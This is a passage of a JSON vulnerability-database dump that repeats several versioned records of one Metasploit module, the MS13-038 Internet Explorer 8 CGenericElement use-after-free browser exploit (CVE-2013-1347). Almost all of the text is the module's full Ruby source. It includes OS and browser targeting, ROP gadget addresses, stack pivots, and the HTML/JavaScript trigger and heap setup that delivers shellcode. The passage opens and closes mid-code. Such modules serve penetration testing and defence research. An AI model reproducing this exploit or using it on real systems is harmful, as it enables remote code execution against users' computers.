on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-04-04T14:16:18", "differentElements": ["modified", "published"], "edition": 37}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-04-06T10:21:41", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P/", "modified": "2018-04-06T10:21:41"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-04-06T10:21:41", "differentElements": ["modified", "published"], "edition": 38}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-04-06T14:12:26", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P/", "modified": "2018-04-06T14:12:26"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-04-06T14:12:26", "differentElements": ["modified", "published"], "edition": 39}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-04-11T20:20:30", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P/", "modified": "2018-04-11T20:20:30"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-04-11T20:20:30", "differentElements": ["modified", "published"], "edition": 40}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-04-11T22:18:25", "history": [], "viewCount": 72, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code 